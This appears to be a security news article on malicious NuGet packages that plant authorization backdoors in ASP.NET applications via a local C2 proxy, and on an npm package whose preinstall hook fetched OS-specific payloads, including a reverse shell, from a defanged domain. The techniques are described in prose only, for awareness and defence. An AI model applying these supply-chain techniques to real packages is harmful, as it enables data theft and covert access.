Malicious NuGet Packages Compromise ASP.NET Applications and Deploy Backdoors
Cybersecurity researchers have uncovered a series of malicious NuGet packages specifically designed to target ASP.NET web application developers, aiming to exfiltrate sensitive data and establish persistent backdoors within affected applications.
The campaign, identified by the security firm Socket, involves four distinct packages:
– NCryptYo
– DOMOAuth2_
– IRAOAuth2.0
– SimpleWriter_
These packages were uploaded to the NuGet repository between August 12 and 21, 2024, by a user named hamzazaheer. Before their removal following responsible disclosure, they had been downloaded over 4,500 times.
Technical Breakdown of the Malicious Packages:
1. NCryptYo: Serving as the initial stage dropper, NCryptYo establishes a local proxy on `localhost:7152`, which relays traffic to an attacker-controlled command-and-control (C2) server. The address of this C2 server is dynamically retrieved at runtime. Notably, NCryptYo attempts to masquerade as the legitimate NCrypto package, adding a layer of deception.
2. DOMOAuth2_ and IRAOAuth2.0: These packages are engineered to steal ASP.NET Identity data, including user accounts, role assignments, and permission mappings. They also manipulate authorization rules to create persistent backdoors within the compromised applications.
3. SimpleWriter_: Disguised as a PDF conversion utility, SimpleWriter_ possesses capabilities for unconditional file writing and hidden process execution, further compromising the integrity of the affected systems.
An analysis of the package metadata revealed identical build environments, suggesting that a single threat actor orchestrated this campaign.
Operational Mechanism:
Upon installation, NCryptYo’s static constructor installs Just-In-Time (JIT) compiler hooks that decrypt embedded payloads and deploy a secondary binary—a localhost proxy on port 7152. This proxy facilitates communication between the companion packages and the attacker’s external C2 server, whose address is resolved dynamically at runtime.
Once the proxy is active, DOMOAuth2_ and IRAOAuth2.0 begin transmitting the ASP.NET Identity data through the local proxy to the external infrastructure. The C2 server responds with authorization rules that are then processed by the application to create a persistent backdoor by granting themselves admin roles, modifying access controls, or disabling security checks. SimpleWriter_, for its part, writes threat actor-controlled content to disk and executes the dropped binary with hidden windows.
The primary objective of this campaign is not to compromise the developer’s machine directly but to infiltrate the applications they build. By controlling the authorization layer during development, the threat actor gains access to deployed production applications. When the victim deploys their ASP.NET application with the malicious dependencies, the C2 infrastructure remains active in production, continuously exfiltrating permission data and accepting modified authorization rules. The threat actor or a buyer can then grant themselves admin-level access to any deployed instance.
Broader Implications:
This disclosure coincides with Tenable’s report on a malicious npm package named ambar-src, which amassed over 50,000 downloads before its removal from the JavaScript registry. Uploaded on February 13, 2026, this package exploited npm’s preinstall script hook to execute malicious code during installation. The malware was designed to run a one-liner command that obtained different payloads from the domain x-ya[.]ru based on the operating system:
– Windows: Downloaded and executed a file named `msinit.exe` containing encrypted shellcode, which was decoded and loaded into memory.
– Linux: Fetched a bash script and executed it. The bash script then retrieved another payload from the same server, an ELF binary that functioned as an SSH-based reverse shell client.
– macOS: Fetched another script that used `osascript` to run JavaScript responsible for dropping Apfell, a JavaScript for Automation (JXA) agent part of the Mythic C2 framework. This agent could conduct reconnaissance, collect screenshots, steal data from Google Chrome, and capture system passwords by displaying a fake prompt.
This campaign underscores the evolving sophistication of supply chain attacks targeting open-source ecosystems. Developers are urged to exercise heightened vigilance when incorporating third-party packages into their projects. Implementing robust security practices, such as verifying package authenticity, monitoring for anomalous network traffic, and conducting regular security audits, is essential to mitigate the risks associated with such threats.
